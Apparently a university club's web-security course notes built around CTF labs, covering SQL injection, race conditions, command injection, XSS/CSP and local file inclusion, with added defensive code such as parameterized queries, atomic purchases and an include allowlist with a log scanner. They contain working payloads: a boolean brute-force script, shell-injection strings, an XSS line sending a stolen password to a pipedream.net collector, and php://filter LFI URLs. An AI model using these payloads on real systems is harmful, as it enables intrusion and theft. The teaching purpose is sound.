# Bamboofox Web Security 2023

[toc]

## Tools

### Burpsuite

https://portswigger.net/burp/releases/professional-community-2023-10-1-1?requestededition=community&requestedplatform=

### Python3

https://www.python.org/downloads/

#### requests

```sh
pip3 install requests
```

## HTTP requests

### Burpsuite proxy

### [Status code](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status)

1. Informational responses (100 – 199)
2. Successful responses (200 – 299)
3. Redirection messages (300 – 399)
4. Client error responses (400 – 499)
5. Server error responses (500 – 599)

### [HTTP headers](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers)

### [Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies)

### [Lab: Cat shop](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/271)

## SQL injection

https://training.ching367436.me/sqlite3-viewer/

https://training.ching367436.me/sql-injection-viewer/

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md

### [Lab: Login panel (login)](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/267)

### UNION based

#### [Lab: Login panel 2 (password)](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/269)

#### [Lab: Login panel 2 (other table)](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/270)

##### 1. Extract table name

```sql
' UNION SELECT 1,(),3,4 --
```

Put `SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'` inside the `()` to select every table name in this database.

Result:

```
Users,S3cr3t_t4bl3
```

##### 2. Extract column name of the S3cr3t_t4bl3

```sql
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name='S3cr3t_t4bl3'
```

Result:

```sql
CREATE TABLE S3cr3t_t4bl3 (id INTEGER PRIMARY KEY, flag_test1234 TEXT)
```

##### 3. Get the flag

```sql
SELECT flag_test1234 FROM S3cr3t_t4bl3
```
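All of the login labs work for the same reason: the server assembles its query from strings, so whatever is typed into the password field is parsed as SQL. The following is an added example (not the lab's code) showing a minimal SQLite login written both ways, so the difference can be seen on the same input. The `Users` table and the admin password `B4mb00f0x` are constructed sample data, and `probe()` rebuilds the `' OR substr(...)` condition from the Boolean based section below purely as test input.

```python
import sqlite3

# Constructed sample data for this example (not the lab's real database).
SCHEMA = """
CREATE TABLE Users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO Users (username, password) VALUES ('admin', 'B4mb00f0x'), ('guest', 'guest');
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def probe(position, guess):
    """The boolean-based condition from the password lab (1-based position),
    reused here only as input to compare the two login implementations."""
    return (
        "' OR substr((SELECT password FROM Users WHERE username='admin'),"
        f"{position},1)='{guess}' --"
    )


def login_vulnerable(db, username, password):
    """Query assembled from strings: the password field is parsed as SQL."""
    query = (
        "SELECT username FROM Users "
        f"WHERE username='{username}' AND password='{password}'"
    )
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Parameterized query: the same input is bound as a literal string value."""
    row = db.execute(
        "SELECT username FROM Users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def oracle_leaks(login):
    """True if a correct first-character guess and a wrong one produce different
    results, i.e. the login function behaves as a boolean oracle."""
    db = make_db()
    right = login(db, "guest", probe(1, "B"))
    wrong = login(db, "guest", probe(1, "X"))
    return right != wrong


if __name__ == "__main__":
    print("vulnerable login leaks:", oracle_leaks(login_vulnerable))  # True
    print("parameterized login leaks:", oracle_leaks(login_safe))     # False
```

With the string-built query, a correct guess logs the attacker in as `admin` (the first row matching the `OR`) while a wrong guess returns nothing, which is exactly the difference the brute-force script keys on. With `?` placeholders the same input is just a password that does not exist, so both calls return `None` and there is nothing to brute-force.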
### Boolean based

#### [Lab: Login panel (password)](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/268)

```sql
' OR substr((SELECT password FROM Users WHERE username='admin'), 1, 1)='B' --
```

Brute-force script:

```python
import requests
from string import printable


def f(guess, i):
    """Return True if character i (0-based) of admin's password equals `guess`."""
    url = "http://bamboofox.cs.nctu.edu.tw:38300/login"
    a = requests.post(url, data={
        "username": "guest",
        "password": f"' OR substr((SELECT password FROM Users WHERE username='admin'),{i+1},1)='{guess}' --",
    })
    # The login page only shows the 2FA step when the injected condition is true.
    return '2FA' in a.text


res = ""
for i in range(128):          # one character position at a time
    for guess in printable:   # try every printable character at that position
        if f(guess, i):
            res += guess
            break
print(res)
```

### Other techniques

- Time based
- Error based
- Out of bound
- Write file
- ...

### Tools

- sqlmap

## Race condition

### [Lab: Starburst Cat Shop](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/277)

#### Steps for buying a cat

1. Check if the balance is sufficient.
2. Make the cat the buyer's property.
3. balance -= cat_price

## Command injection

### Command

#### Tools

- [Online terminal](https://www.tutorialspoint.com/linux_terminal_online.php)
- [WSL](https://learn.microsoft.com/en-us/windows/wsl/install)
- Docker

Last year's club session: https://discord.com/channels/1003684703284498462/1003684704291143853/1082607913509584956

> Slides: https://drive.google.com/file/d/1GKCqR78Hg27sgreviXyFGeeOmzFS6vpL/view?usp=share_link

### PHP

- [PHP Online Server](https://replit.com/languages/php7)

### [Lab: Curl Online](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/272)

- https://book.hacktricks.xyz/linux-hardening/bypass-bash-restrictions

```sh
# the server runs this, with $url substituted into the single quotes
curl -s '$url';

# each $url below is followed by the command line it produces
$url = "';ls'";
curl -s '';ls'';

$url = "';l's' '/";
curl -s '';l's' '/';

$url = "'; ca't' '/f''lag-415cd468353da8d26974ae6f8a7d9b30a830b8b4";
curl -s ''; ca't' '/f''lag-415cd468353da8d26974ae6f8a7d9b30a830b8b4'
```

### [Lab: Curl Online Pro](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/275)

- [linux proc](https://man7.org/linux/man-pages/man5/proc.5.html)
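Going back to the Starburst Cat Shop steps above: the bug is that step 1 (the check) and step 3 (the debit) are separate statements, so a second request for the same buyer can slip in between them and both pass the check. The following is an added example (not the lab's code) that simulates that interleaving deterministically in Python with SQLite. The shop tables, one buyer with exactly one cat's worth of balance, and the `after_check` hook that stands in for the scheduler are all constructed for the example.

```python
import sqlite3


def make_shop():
    """Constructed shop state: one buyer with 100, two cats costing 100 each."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, balance INTEGER NOT NULL);
        CREATE TABLE cats  (id INTEGER PRIMARY KEY, price INTEGER NOT NULL, owner INTEGER);
        INSERT INTO users (id, balance) VALUES (1, 100);
        INSERT INTO cats (id, price) VALUES (1, 100), (2, 100);
    """)
    return db


def buy_naive(db, user_id, cat_id, after_check=lambda: None):
    """Steps 1-3 exactly as listed in the notes. `after_check` is a hook standing in
    for the scheduler: whatever runs there is another request arriving between the
    balance check and the debit."""
    price = db.execute("SELECT price FROM cats WHERE id=?", (cat_id,)).fetchone()[0]
    balance = db.execute("SELECT balance FROM users WHERE id=?", (user_id,)).fetchone()[0]
    if balance < price:                                                     # 1. check
        return False
    after_check()                                                           # <- race window
    db.execute("UPDATE cats SET owner=? WHERE id=?", (user_id, cat_id))     # 2. give cat
    db.execute("UPDATE users SET balance=balance-? WHERE id=?", (price, user_id))  # 3. debit
    db.commit()
    return True


def buy_atomic(db, user_id, cat_id, after_check=lambda: None):
    """Check and debit are one conditional UPDATE inside one transaction, so no
    interleaving can separate them. The hook sits before it: the other request
    gets to run completely first, and the database state still stays consistent."""
    price = db.execute("SELECT price FROM cats WHERE id=?", (cat_id,)).fetchone()[0]
    after_check()
    debited = db.execute(
        "UPDATE users SET balance=balance-? WHERE id=? AND balance>=?",
        (price, user_id, price),
    ).rowcount
    claimed = db.execute(
        "UPDATE cats SET owner=? WHERE id=? AND owner IS NULL", (user_id, cat_id)
    ).rowcount
    if debited != 1 or claimed != 1:       # insufficient funds or cat already sold
        db.rollback()                      # undo the partial transaction
        return False
    db.commit()
    return True


def run_scenario(buy):
    """Two requests for the same buyer interleave: the second arrives inside the
    first one's race window. Returns (first_ok, second_ok, balance, cats_owned)."""
    db = make_shop()
    second = []
    first = buy(db, 1, 1, after_check=lambda: second.append(buy(db, 1, 2)))
    balance = db.execute("SELECT balance FROM users WHERE id=1").fetchone()[0]
    owned = db.execute("SELECT count(*) FROM cats WHERE owner=1").fetchone()[0]
    return first, second[0], balance, owned


if __name__ == "__main__":
    print("naive :", run_scenario(buy_naive))   # (True, True, -100, 2)
    print("atomic:", run_scenario(buy_atomic))  # (False, True, 0, 1)
```

The naive version ends with two cats owned and a balance of -100, which is the double spend the lab is about. The atomic version lets the request that arrives first win and rejects the other because the `balance>=?` condition is evaluated by the same statement that debits. With a real multi-user database the same pattern works because the conditional UPDATE is executed atomically under the row lock; the alternative is an explicit `SELECT ... FOR UPDATE` (or SQLite's `BEGIN IMMEDIATE`) around the check and debit.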
### [Lab: Curl Online Max](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/276)

https://training.ching367436.me/shell/shell.php

https://training.ching367436.me/shell/shell.php\

#### solve

```
https://training.ching367436.me/shell/shell.php' -o ching367436.php 'test
```

```sh
curl -s 'https://training.ching367436.me/shell/shell.php'\\'' -o ching367436.php '\\''test'
```

## Front-end security

### [URL](https://www.rfc-editor.org/rfc/rfc3986#section-3)

```url
http://userinfo@bamboofox.cs.nctu.edu.tw:38300/login?name=ferret#nose
\__/   \_____________________________________/\____/ \_________/ \__/
  |                       |                     |         |       |
scheme                authority               path     query   fragment
```

https://github.com/splitline/domain-obfuscator

http://www.unicode.org/reports/tr46/#Mapping

> IDNA2003 requires a mapping phase, which maps ÖBB.at to öbb.at, for example. Mapping typically involves mapping uppercase characters to their lowercase pairs, but it also involves other types of mappings between equivalent characters, such as mapping halfwidth katakana characters to normal katakana characters in Japanese. The mapping phase in IDNA2003 was included to match the insensitivity of ASCII domain names. Users are accustomed to having both CNN.com and cnn.com work identically. They expect domain names with accents to have the same casing behavior, so that ÖBB.at is the same as öbb.at. There are variations similar to case differences in other scripts. The IDNA2003 mapping is based on data specified in the Unicode Standard, Version 3.2; this mapping was later formalized as the Unicode property [NFKC_Casefold].

<!-- https://www.xudongz.com/blog/2017/idn-phishing/ -->

### HTML, CSS, JavaScript

#### Tools

- [Visual Studio Code](https://code.visualstudio.com/download)
- [Live Server](https://marketplace.visualstudio.com/items?itemName=ritwickdey.LiveServer)

### [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy)

Same-origin: protocol, host, and port are all the same.
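The URL diagram, the IDNA mapping quote and the same-origin rule fit together: the browser compares scheme, host and port, and the host it compares is the mapped, punycode form. The following is an added example (not from the course) that does the three things in Python with the standard library: split the diagram's URL into its components, apply the IDNA mapping so `ÖBB.at` and `öbb.at` agree, and compare origins. `DEFAULT_PORTS`, `is_internationalized` and the sample URL are constructed for the example; the `idna` codec is Python's built-in IDNA2003 implementation.

```python
from urllib.parse import urlsplit

# Assumption for this example: an absent port means the scheme's default port.
DEFAULT_PORTS = {"http": 80, "https": 443}

# The sample URL from the diagram above.
SAMPLE = "http://userinfo@bamboofox.cs.nctu.edu.tw:38300/login?name=ferret#nose"


def url_parts(url):
    """Split a URL into the RFC 3986 components named in the diagram."""
    u = urlsplit(url)
    return {
        "scheme": u.scheme,
        "authority": u.netloc,       # userinfo@host:port
        "userinfo": u.username,
        "host": u.hostname,          # already lowercased by urlsplit
        "port": u.port,
        "path": u.path,
        "query": u.query,
        "fragment": u.fragment,
    }


def ascii_host(host):
    """Apply the IDNA2003 mapping (case folding and friends) and punycode-encode
    any non-ASCII label, so 'ÖBB.at' and 'öbb.at' both become 'xn--bb-eka.at'."""
    return host.encode("idna").decode("ascii")


def is_internationalized(host):
    """True if any label needed punycode. Handy as a check when a hostname is
    expected to be a plain ASCII brand name and a lookalike would stand out."""
    return any(label.startswith("xn--") for label in ascii_host(host).split("."))


def origin(url):
    """The (scheme, host, port) triple that the same-origin policy compares."""
    u = urlsplit(url)
    port = u.port if u.port is not None else DEFAULT_PORTS.get(u.scheme)
    return (u.scheme, ascii_host(u.hostname or ""), port)


def same_origin(url_a, url_b):
    return origin(url_a) == origin(url_b)
```

Note what the comparison ignores: the userinfo, path, query and fragment play no part, which is why a page on `/login` can call `/api/portfolio` on the same host and port (the XSS labs below rely on exactly that), while `http://` and `https://` on the same host, or the same host on a different port, are different origins.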
### Cross-site scripting (XSS)

#### [Lab: E-Portfolio baby](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/273)

~~https://webhook.site/~~

https://pipedream.net/

```javascript!
fetch('/api/portfolio')
  .then(res => res.json())
  .then(data => {
    location = 'https://enr7kjj1uzbla.x.pipedream.net/?' + data.data.password
  })
```

```html!
<img src=x onerror="fetch('/api/portfolio').then(res => res.json()).then(data => {location = 'https://enr7kjj1uzbla.x.pipedream.net/?'+data.data.password;})">
```

Solution: https://ching367436.github.io/ais3-pre-exam-2023-write-up/#E-portfolio-baby

### [Content Security Policy (CSP)](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)

https://csp-evaluator.withgoogle.com/

#### [Lab: E-Portfolio](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/274)

https://e-portfolio.ching367436.me:8443/avatars/ea6209bcae582fd7a60a77dc71d624e4.svg

```
<svg xmlns="http://www.w3.org/2000/svg">
  <script href="https://accounts.google.com/o/oauth2/revoke?callback=location='https://ching367436.me';"></script>
</svg>
```

Solution: https://ching367436.github.io/ais3-pre-exam-2023-write-up/#E-portfolio

#### XSS games

https://xss-game.appspot.com

https://prompt.ml

## Local File Inclusion

#### [Lab: Simple Site (retrieve source code)](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/278)

```
https://simple-site.ching367436.me:8443/?page=php://filter/convert.base64-encode/resource=./includes/contact.php
```

#### [Lab: Simple Site (RCE)](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/279)

https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT
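Both Simple Site labs come down to `?page=` being handed to `include()` unchanged, which is what lets a `php://` wrapper or a relative path stand in for a page name. The following is an added example (not the lab's code) of the defensive side in Python: an allowlist resolver that only ever maps a page name to a file inside the include directory, and a small scanner that flags include-style probes in web server logs. `ALLOWED_PAGES`, the include directory and the `SAMPLE_LOG` lines are all constructed for the example; the stream-wrapper line reuses the lab's own URL.

```python
from pathlib import Path
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed allowlist: the pages the site is willing to include, keyed by the
# value accepted in ?page= and mapped to a file name under the include directory.
ALLOWED_PAGES = {"home": "home.php", "about": "about.php", "contact": "contact.php"}


def resolve_include(page, include_dir):
    """Map a ?page= value to a file path, or return None if it must be refused."""
    if page not in ALLOWED_PAGES:            # names only, never paths or wrappers
        return None
    base = Path(include_dir).resolve()
    target = (base / ALLOWED_PAGES[page]).resolve()
    if base not in target.parents:           # defence in depth: still inside the directory
        return None
    return target


def unsafe_reason(value):
    """Why a raw ?page= value is unsafe to hand to include(), for logging and alerting."""
    v = unquote(unquote(value))              # decode twice to see through double encoding
    if "\x00" in v:
        return "null byte"
    if "://" in v:                           # php://filter, data:, http:, ...
        return "stream wrapper"
    if ".." in v.replace("\\", "/").split("/"):
        return "path traversal"
    return None


# Constructed access-log lines (common log format) for the scanner below.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Nov/2023:10:00:01 +0800] "GET /?page=contact HTTP/1.1" 200 512
203.0.113.5 - - [01/Nov/2023:10:00:07 +0800] "GET /?page=php://filter/convert.base64-encode/resource=./includes/contact.php HTTP/1.1" 200 3090
203.0.113.5 - - [01/Nov/2023:10:00:09 +0800] "GET /?page=..%2F..%2Fconfig.php HTTP/1.1" 200 1810
"""


def scan_log(text):
    """Return (line number, reason) for each request whose page parameter looks like an include probe."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split('"')
        if len(parts) < 2:
            continue
        request = parts[1].split()           # ["GET", "/?page=...", "HTTP/1.1"]
        if len(request) < 2:
            continue
        params = parse_qs(urlsplit(request[1]).query, keep_blank_values=True)
        for value in params.get("page", []):
            reason = unsafe_reason(value)
            if reason:
                hits.append((n, reason))
    return hits


if __name__ == "__main__":
    print(resolve_include("contact", "/srv/site/includes"))
    print(scan_log(SAMPLE_LOG))   # [(2, 'stream wrapper'), (3, 'path traversal')]
```

The resolver never builds a path from the request at all, so the wrapper and traversal cases are refused simply because they are not keys in the allowlist; the `parents` check is there in case someone later turns the allowlist values into user-controlled paths. The scanner is deliberately simple and keyed on the `page` parameter the labs use; in practice the same `unsafe_reason` check can be run over every query parameter.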